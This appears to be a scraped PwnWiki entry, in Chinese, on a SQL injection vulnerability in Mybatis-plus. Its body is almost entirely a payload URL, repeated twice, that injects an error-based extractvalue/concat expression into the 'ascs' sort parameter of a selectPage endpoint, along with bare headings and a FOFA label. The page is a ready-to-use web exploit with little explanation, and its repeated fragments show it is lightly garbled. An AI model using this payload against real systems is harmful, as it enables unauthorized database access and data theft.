Mybatis-plus SQL注入漏洞
From PwnWiki
FOFA
Mybatis
Payload
http://127.0.0.1:8081/user/selectPage?ascs=extractvalue(1,concat(char(126),md5(123)))&ascs=1
Mybatis
http://127.0.0.1:8081/user/selectPage?ascs=extractvalue(1,concat(char(126),md5(123)))&ascs=1